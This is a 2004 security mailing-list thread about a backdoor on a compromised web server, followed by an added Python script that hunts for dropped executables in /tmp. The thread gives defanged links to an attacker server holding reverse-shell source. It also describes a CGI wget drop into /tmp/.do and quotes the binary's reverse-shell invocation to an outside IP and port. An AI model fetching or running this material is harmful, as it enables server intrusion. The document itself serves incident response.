
RE: [suse-security] Re: Backdoor over http(s)??



It looks like the source was left on the server (along with other things):

httpREMOVE://218.234.171.84/manual/.x/rs.c

Only follow the link if you know what you are doing (and remove the REMOVE
text)

The rest of the files:

httpREMOVE://218.234.171.84/manual/.x/

> -----Original Message-----
> From: jaska [mailto:jaska@xxxxxxxxx]
> Sent: Tuesday 13 January 2004 03:16 PM
> To: suse-security@xxxxxxxx
> Subject: Re: [suse-security] Re: Backdoor over http(s)??
> 
> 
> Hi 
> 
> I found that server too, and some other "a-bit-worrying" stuff...
> 
> For some reason my e-mail never reached this list.. wonder what happens
> this time.
> 
> Jask.a
> 
> 
> > Some CGI at your webserver did run wget to receive some file from
> > 218.234.171.84 and save it on your disc as "/tmp/.do".
> > wwwrun:nogroup are standard user and group used for apache.
> >
> > The file is still available from http://218.234.171.84/manual/.x/rhs
> > I don't want to execute it, but strings does list some information:
> >
> > usage: %s <IP or hostname> <port>
> >
> > (/tmp/.do 163.17.51.8 9090)
> >
> 
> 
> -- 
> Check the headers for your unsubscription address
> For additional commands, e-mail: suse-security-help@xxxxxxxx
> Security-related bug reports go to security@xxxxxxx, not here
> 


Siemens Traffic Controls is a division of Siemens plc. Registered No.
727817, England. 
Registered office: Siemens House, Oldbury, Bracknell, Berkshire, RG12 8FZ. 

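A triage check for the drop pattern described in the quoted message above (a file fetched through a CGI and saved as a dot-file in /tmp under the web server account), as an added example that is not part of the original thread. The function name, the /var/tmp directory and the two heuristics (ELF magic, hidden name with an execute bit) are assumptions of this example; "wwwrun" is the account named in the thread.

```python
import os
import pwd
import stat
import sys

ELF_MAGIC = b"\x7fELF"

def find_dropped_files(root, uid):
    """Return sorted (path, reasons) for regular files under root owned by uid
    that are ELF binaries and/or dot-named files with an execute bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):  # symlinked dirs are not followed
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # file vanished between listing and stat
            if not stat.S_ISREG(st.st_mode) or st.st_uid != uid:
                continue
            try:
                # O_NOFOLLOW: never read through a symlink swapped in after lstat
                fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
                with os.fdopen(fd, "rb") as fh:
                    is_elf = fh.read(4) == ELF_MAGIC
            except OSError:
                is_elf = False  # unreadable: still judged on name and mode
            reasons = []
            if is_elf:
                reasons.append("elf")
            if name.startswith(".") and st.st_mode & 0o111:
                reasons.append("hidden-executable")
            if reasons:
                hits.append((path, reasons))
    return sorted(hits)

if __name__ == "__main__":
    # Assumed defaults: account "wwwrun" (from the thread), /tmp and /var/tmp.
    account = sys.argv[1] if len(sys.argv) > 1 else "wwwrun"
    try:
        uid = pwd.getpwnam(account).pw_uid
    except KeyError:
        sys.exit(f"no such account: {account}")
    for tmpdir in ("/tmp", "/var/tmp"):
        for path, reasons in find_dropped_files(tmpdir, uid):
            print(f"{path}\t{','.join(reasons)}")
```

Run it as root so files the web server account made unreadable are still inspected; a hit is a lead for review, not proof of compromise.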